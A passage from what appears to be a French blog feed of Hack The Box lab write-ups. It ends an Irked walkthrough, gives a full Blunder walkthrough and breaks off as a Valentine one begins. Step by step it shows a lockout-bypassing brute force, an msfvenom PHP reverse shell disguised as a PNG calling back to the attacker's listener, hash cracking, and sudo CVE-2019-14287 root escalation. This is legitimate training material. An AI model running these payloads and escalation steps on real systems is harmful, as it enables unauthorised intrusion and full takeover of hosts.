</span></span><span class="line"><span class="cl">bash-4.3# <span class="nb">echo</span> <span class="nv">$PATH</span> </span></span><span class="line"><span class="cl">/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nano /tmp/who ----&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">chmod +s /bin/bash </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">djmardov@irked:~$ /usr/bin/viewuser </span></span><span class="line"><span class="cl">This application is being devleoped to <span class="nb">set</span> and <span class="nb">test</span> user permissions </span></span><span class="line"><span class="cl">It is still being actively developed </span></span><span class="line"><span class="cl">sh: 1: /tmp/listusers: Permission denied </span></span><span class="line"><span class="cl">djmardov@irked:~$ bash -p </span></span><span class="line"><span class="cl">bash-4.3# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">bash-4.3# cat /root/root.txt </span></span><span class="line"><span class="cl">259a.....a166 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/blunder-htb/Thu, 13 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/blunder-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Blunder cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Blunder</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.191</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv 10.10.10.191 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">21/tcp closed ftp conn-refused </span></span><span class="line"><span class="cl">80/tcp open http syn-ack Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Blunder <span class="p">|</span> A blunder of interesting facts </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-generator: Blunder </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="webserver--todotxt">Webserver : todo.txt </h3><p>Sur le port 80, on trouve un serveur web. A la racine se trouve un fichier todo.txt avec des informations intéressantes.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">-Update the CMS </span></span><span class="line"><span class="cl">-Turn off FTP - DONE </span></span><span class="line"><span class="cl">-Remove old users - DONE </span></span><span class="line"><span class="cl">-Inform fergus that the new blog needs images - PENDING </span></span></code></pre></td></tr></table> </div> </div><h3 id="bruteforce-admin-login-page">Bruteforce admin login page </h3><p>On peut bruteforce la page admin avec l&rsquo;utilisateur potentiel &ldquo;fergus&rdquo; qu&rsquo;on a trouvé dans le todo.txt. Il y a une protection contre le bruteforce qui blacklist notre IP. Mais on peut changer le parametre &ldquo;X_FORWADED_FOR: 127.0.0.1&rdquo; avec une autre ip aléatoire et à nouveau effectuer de nouvelles tentatives d&rsquo;authentification. Quelqu&rsquo;un a déjà créer un script sur github en ruby pour effectuer cette attaque bruteforce facilement. On le trouve en utilisant searchsploit mais egalement sur internet: <a class="link" href="https://github.com/noraj/Bludit-auth-BF-bypass" target="_blank" rel="noopener" >https://github.com/noraj/Bludit-auth-BF-bypass</a></p> <p>Pour la liste de mot de passe, le mot de passe ne semble pas etre dans la lite rockyou. Le reflexe est donc de créer une liste grâce à cewl et tous les mots présents sur la page d&rsquo;accueil :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cewl http://10.10.10.191 &gt; pass.txt </span></span></code></pre></td></tr></table> </div> </div><p>On peut maintenant effectuer notre attaque bruteforce avec notre script, l&rsquo;utilisateur fergus ainsi que la liste de mot de passe basé sur les mots présents sur la page d&rsquo;accueil du site web :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ruby exploit.rb -r http://10.10.10.191 -u fergus -w ./pass.txt </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: CeWL 6.1 <span class="o">(</span>Max Length<span class="o">)</span> Robin Wood <span class="o">(</span>robin@digi.ninja<span class="o">)</span> <span class="o">(</span>https://digi.ninja/<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: the </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: book </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: collections </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Bram </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Stoker </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: British </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Society </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Book </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Foundation </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: him </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Distinguished </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Contribution </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: Letters </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: probably </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: best </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: fictional </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: character </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying password: RolandDeschain </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Password found: RolandDeschain </span></span></code></pre></td></tr></table> </div> </div><p>On trouve les creds suivants : fergus:<code>RolandDeschain</code></p> <h3 id="directory-traversal">Directory Traversal </h3><p>On trouve une exploit sur searchsploit permettant d&rsquo;uploader une image png contenant du code php. Ici on générere avec msfvenom un reverseshell qu&rsquo;on va uploader en tant qu&rsquo;image png. Puis, on va pouvoir y accéder et executer le code en se rendant sur l&rsquo;url: /bl-content/tmp/temp/evil.png</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">#####################################################&#34;</span> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ msfvenom -p php/reverse_php <span class="nv">LHOST</span><span class="o">=</span>10.10.16.19 <span class="nv">LPORT</span><span class="o">=</span><span class="m">1337</span> -f raw -b <span class="s1">&#39;&#34;&#39;</span> &gt; evil.png </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No platform was selected, choosing Msf::Module::Platform::PHP from the payload </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> No arch selected, selecting arch: php from the payload </span></span><span class="line"><span class="cl">Found <span class="m">1</span> compatible encoders </span></span><span class="line"><span class="cl">Attempting to encode payload with <span class="m">1</span> iterations of php/base64 </span></span><span class="line"><span class="cl">php/base64 succeeded with size <span class="m">4051</span> <span class="o">(</span><span class="nv">iteration</span><span class="o">=</span>0<span class="o">)</span> </span></span><span class="line"><span class="cl">php/base64 chosen with final size <span class="m">4051</span> </span></span><span class="line"><span class="cl">Payload size: <span class="m">4051</span> bytes </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> -e <span class="s2">&#34;&lt;?php </span><span class="k">$(</span>cat evil.png<span class="k">)</span><span class="s2">&#34;</span> &gt; evil.png </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">#######################################################</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Après le premier test, je n&#39;arrivais pas a stabiliser mon shell</span> </span></span><span class="line"><span class="cl"><span class="c1">## J&#39;ai donc utiliser un autre code php pour ouvrir un reverse shell</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cp php-reverse-shell.php evil.png </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat evil.png </span></span><span class="line"><span class="cl">&lt;?php eval<span class="o">(</span>base64_decode<span class="o">(</span><span class="s1">&#39;IoJG91dCkpOwogICAgICB......2xvc2UoJHMpOwogICAgfQo&#39;</span><span class="o">))</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> <span class="s2">&#34;RewriteEngine off&#34;</span> &gt; .htaccess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> <span class="s2">&#34;AddType application/x-httpd-php .png&#34;</span> &gt;&gt; .htaccess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 dir_traversal.py </span></span><span class="line"><span class="cl">cookie: qg5smk61bhamr0lg3t0s8n9mq5 </span></span><span class="line"><span class="cl">csrf_token: 6325cd57b7d27ae4de54cefa8d79d6a7e15279d8 </span></span><span class="line"><span class="cl">Uploading payload: evil.png </span></span><span class="line"><span class="cl">Uploading payload: .htaccess </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">---------------------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.16.19<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.191<span class="o">]</span> <span class="m">36802</span> </span></span><span class="line"><span class="cl">Linux blunder 5.3.0-53-generic <span class="c1">#47-Ubuntu SMP Thu May 7 12:18:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 23:40:39 up <span class="m">1</span> day, 7:09, <span class="m">1</span> user, load average: 0.00, 0.00, 0.00 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl">shaun :0 :0 Tue16 ?xdm? 8:54 0.00s /usr/lib/gdm3/gdm-x-session --run-script env <span class="nv">GNOME_SHELL_SESSION_MODE</span><span class="o">=</span>ubuntu /usr/bin/gnome-session --systemd --session<span class="o">=</span>ubuntu </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">/bin/sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@blunder:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@blunder:/$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Blunder<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@blunder:/$ whoami </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h3 id="getting-hugo-user---user-flag">Getting Hugo user - user flag </h3><p>En fouillant un peu dans les fichiers du serveur web, on trouve rapidement le mot de passe de hugo: faca404fd5c0a31cf1897b823c695c85cffeb98d Dans crackstation on obtient: hugo : <code>Password120</code></p> <p>J&rsquo;ai fait un grep de hugo car j&rsquo;ai vu le nom de cet utilisant dans le dossier /home. De plus, hugo etait l&rsquo;utilisateur contenant disposant du fichier user.txt.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@blunder:/$ <span class="nb">cd</span> var </span></span><span class="line"><span class="cl">www-data@blunder:/var$ <span class="nb">cd</span> www </span></span><span class="line"><span class="cl">www-data@blunder:/var/www$ ls </span></span><span class="line"><span class="cl">bludit-3.10.0a bludit-3.9.2 html </span></span><span class="line"><span class="cl">www-data@blunder:/var/www$ grep -rni hugo </span></span><span class="line"><span class="cl">bludit-3.10.0a/bl-content/databases/users.php:4: <span class="s2">&#34;nickname&#34;</span>: <span class="s2">&#34;Hugo&#34;</span>, </span></span><span class="line"><span class="cl">bludit-3.10.0a/bl-content/databases/users.php:5: <span class="s2">&#34;firstName&#34;</span>: <span class="s2">&#34;Hugo&#34;</span>, </span></span><span class="line"><span class="cl">www-data@blunder:/var/www$ <span class="nb">cd</span> bludit-3.10.0a/ </span></span><span class="line"><span class="cl">www-data@blunder:/var/www/bludit-3.10.0a$ <span class="nb">cd</span> bl-content/ </span></span><span class="line"><span class="cl">www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ <span class="nb">cd</span> databases/ </span></span><span class="line"><span class="cl">www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls </span></span><span class="line"><span class="cl">categories.php plugins site.php tags.php </span></span><span class="line"><span class="cl">pages.php security.php syslog.php users.php </span></span><span class="line"><span class="cl">www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php </span></span><span class="line"><span class="cl">&lt;?php defined<span class="o">(</span><span class="s1">&#39;BLUDIT&#39;</span><span class="o">)</span> or die<span class="o">(</span><span class="s1">&#39;Bludit CMS.&#39;</span><span class="o">)</span><span class="p">;</span> ?&gt; </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;admin&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;nickname&#34;</span>: <span class="s2">&#34;Hugo&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;firstName&#34;</span>: <span class="s2">&#34;Hugo&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;lastName&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;role&#34;</span>: <span class="s2">&#34;User&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;password&#34;</span>: <span class="s2">&#34;faca404fd5c0a31cf1897b823c695c85cffeb98d&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;email&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;registered&#34;</span>: <span class="s2">&#34;2019-11-27 07:40:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;tokenRemember&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;tokenAuth&#34;</span>: <span class="s2">&#34;b380cb62057e9da47afce66b4615107d&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;tokenAuthTTL&#34;</span>: <span class="s2">&#34;2009-03-15 14:00&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;twitter&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;facebook&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;instagram&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;codepen&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;linkedin&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;github&#34;</span>: <span class="s2">&#34;&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;gitlab&#34;</span>: <span class="s2">&#34;&#34;</span><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl">www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo </span></span><span class="line"><span class="cl">Password: </span></span><span class="line"><span class="cl">hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ <span class="nb">cd</span> </span></span><span class="line"><span class="cl">hugo@blunder:~$ cat user.txt </span></span><span class="line"><span class="cl">779f.....44d0 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="cve-2019-14287--hugo---root">CVE-2019-14287 : hugo -&gt; root </h3><p>On fait un sudo -l en tant que hugo:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">exit</span> </span></span><span class="line"><span class="cl">hugo@blunder:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> hugo on blunder: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User hugo may run the following commands on blunder: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL, !root<span class="o">)</span> /bin/bash </span></span></code></pre></td></tr></table> </div> </div><p>On observe qu&rsquo;il peut ouvrir un shell en tant que n&rsquo;importe quel utilisateur, sauf root.</p> <p>En cherchant un peu sur le web + chatGPT s&rsquo;il est possible de bypasser cette restriction, on découvre une CVE:</p> <p><strong>CVE-2019-14287</strong> : Sudo doesn&rsquo;t check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv -u#-1 returns as 0 which is root&rsquo;s id. (De même pour 4294967295 qui dépasse la limite d&rsquo;un int ? Donne 0, donc l&rsquo;id de root à nouveau ?)</p> <p>and /bin/bash is executed with root permission</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">hugo@blunder:~$ sudo -u#-1 /bin/bash </span></span><span class="line"><span class="cl">root@blunder:/home/hugo# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@blunder:/home/hugo# cat /root/root.txt </span></span><span class="line"><span class="cl">99b9.....1d73 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------V2------------- </span></span><span class="line"><span class="cl">hugo@blunder:~$ sudo -u#4294967295 /bin/bash </span></span><span class="line"><span class="cl">root@blunder:/home/hugo# whoami </span></span><span class="line"><span class="cl">root </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/valentine-htb/Wed, 12 Feb 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/valentine-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Valentine cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Valentine</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.79</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 